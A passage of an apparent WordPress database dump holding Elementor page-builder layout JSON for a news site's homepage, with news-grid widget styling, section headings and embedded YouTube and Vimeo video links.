ackground_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Populaires\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8e8e973\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"3\",\"vertical_position\":{\"unit\":\"%\",\"size\":15},\"horizontal_position\":{\"unit\":\"%\",\"size\":11},\"width\":\"600\",\"height\":\"300\",\"category_bg_color\":\"#357edd\",\"margin_bottom\":10},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false}]'),(1437,494,'_elementor_version','0.4'),(1438,494,'_elementor_css','a:3:{s:4:\"time\";i:1508921367;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(1440,495,'_elementor_edit_mode','builder'),(1441,495,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\